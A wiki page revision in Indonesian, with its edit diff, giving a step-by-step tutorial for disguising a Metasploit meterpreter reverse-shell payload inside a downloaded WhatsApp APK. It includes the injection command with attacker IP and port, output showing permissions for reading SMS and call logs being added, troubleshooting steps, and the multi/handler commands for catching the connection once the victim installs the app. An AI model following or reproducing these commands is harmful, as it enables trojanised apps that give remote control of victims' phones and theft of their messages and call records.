Difference between revisions of "MSF: Embed MSF exploit di ori apk"

From OnnoWiki
Jump to navigation Jump to search
Line 75: Line 75:
 
  [+] Infected file com_backdoored.apk ready.
 
  [+] Infected file com_backdoored.apk ready.
  
 +
Nama file
  
In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.
+
com_backdoored.apk
  
NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You also may need to forward the port you’re using for this attack to work properly.
+
Kalau anda kurang beruntung, kemungkinan payload-injector tidak bisa menemukan Activity yang harus dia bind. Untuk itu kita perlu membuka folder
  
Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.
+
original
  
Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and from there, note the name of that Activity.
+
Lakukan,
  
At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.
+
* Buka / edit AndroidManifest.xml
 
+
* Cari <activity> tag yang berisi text ‘.MAIN’ dan ‘.LAUNCHER’.
This is the hardest step of all, so I’m posting some screenshots to make your life easier.
+
* Cari attribute ‘android:name’ dari sit, catat nama dari Activity.
 
+
* Ulangi lagi proses-nya, jika ruby script menanyakan Activitynya, masukan nomor yang terkait dengan Activity name yang anda catat sebelumnya dan press ENTER.
Screenshot from 2015-12-12 01-44-01Screenshot from 2015-12-12 01-43-27
 
  
 
==PROFIT?!:==
 
==PROFIT?!:==

Revision as of 10:34, 1 June 2017

sumber: https://techkernel.org/2015/12/11/embed-metasploit-payload-in-apk-easily/


Salah satu masalah dalam teknik serangan ke android adalah bagaimana caranya supaya payload serangan yang kita buat menggunakan meterpreter di metasploit menjadi serasa aplikasi yang sah dan akan di install oleh korban. Untuk itu kita perlu meng-embed payload yang kita buat menggunakan metasploit ke aplikasi yang sah.

PRE-REQUISTICS

  • Siapkan laptop / VM dengan kali linux.
  • tool yang digunakan apktool

STEP 1:

  • Cari apk orgininal
  • Keyword google "app_name apk download", misalnya "whatsapp apk download"

Untuk WhatsApp apk

  • Masuk ke
http://www.androidapksfree.com/apk/whatsapp-apk-latest-version-download/
http://pollux.androidapksfree.com/polluxdata/6cc0605e4a0f974c583e1d506a5f538e/com.whatsapp_v2.17.200-451830_Android-4.0.apk
  • filenya adalah
com.whatsapp_v2.17.200-451830_Android-4.0.apk


STEP 2:

Download Ruby script dari

https://github.com/SkullTech/apk-payload-injector

atau menggunakan CLI

wget https://github.com/SkullTech/apk-payload-injector/archive/master.zip
unzip master.zip

Simpan apk & script ruby di folder yang sama

mv com.whatsapp_v2.17.200-451830_Android-4.0.apk apk-payload-injector-master/

STEP 3:

Di CLI Kali Linux, cek IP kali linux (Misalnya 192.168.0.104)

ifconfig -a

Di CLI Kali Linux, emmbed meterpreter ke apk

cd apk-payload-injector-master/
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
cd apk-payload-injector-master/
ruby apk-embed-payload.rb com.whatsapp_v2.17.200-451830_Android-4.0.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895


Akan keluar kira-kira,

[*] Generating msfvenom payload..
[*] Signing payload..
[*] Decompiling orignal APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[*] Copying payload files..
[*] Loading original/smali/com/whatsapp/Main.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding com.whatsapp_v2.17.200-451830_Android-4.0.apk with meterpreter injection as com_backdoored.apk..
[*] Signing com_backdoored.apk ..
[+] Infected file com_backdoored.apk ready.

Nama file

com_backdoored.apk

Kalau anda kurang beruntung, kemungkinan payload-injector tidak bisa menemukan Activity yang harus dia bind. Untuk itu kita perlu membuka folder

original

Lakukan,

  • Buka / edit AndroidManifest.xml
  • Cari <activity> tag yang berisi text ‘.MAIN’ dan ‘.LAUNCHER’.
  • Cari attribute ‘android:name’ dari sit, catat nama dari Activity.
  • Ulangi lagi proses-nya, jika ruby script menanyakan Activitynya, masukan nomor yang terkait dengan Activity name yang anda catat sebelumnya dan press ENTER.

PROFIT?!:

Di kali linux CLI, ketik

msfconsole

masuk ke

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Tunggu sampai android korban berkomunikasi


Referensi